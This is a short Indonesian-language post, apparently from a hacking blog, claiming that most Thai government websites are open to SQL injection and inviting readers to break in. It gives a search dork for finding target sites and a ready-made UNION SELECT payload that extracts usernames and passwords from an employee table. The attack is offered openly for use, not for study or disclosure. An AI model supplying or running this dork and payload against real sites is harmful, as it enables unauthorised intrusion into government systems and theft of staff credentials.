Situs – situs pemerintahan thailand, banyak sekali yang mempunyai kerentanan dan ringan diinjeksi. Hanya cukup bersama lakukan sql injection, kalian dapat menyusupi database berasal dari situs target.
Vuln ini sebetulnya telah lama ditemukan dan saya pun dulu memicu write upnya di laman facebook, namun entah kenapa tidak tersedia perbaikan berasal dari pihak admin situs pemerintah thailand. Dan bukan cuma satu dua, namun hampir seluruh situs tetap dapat disusupi manfaatkan sql injection.
Tanpa wajib tools seperti havij dan sqlmap, ataupun injeksi secara manual. Disini saya dapat berikan dork beserta exploit yang dapat segera mengkuak database websitenya.
Dork: inurl:plantype_id= main.php
Exploit: -69+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13+from+m_employee–+-
Baca selengkapnya di Thailand Government SQL Injection Vulnerability.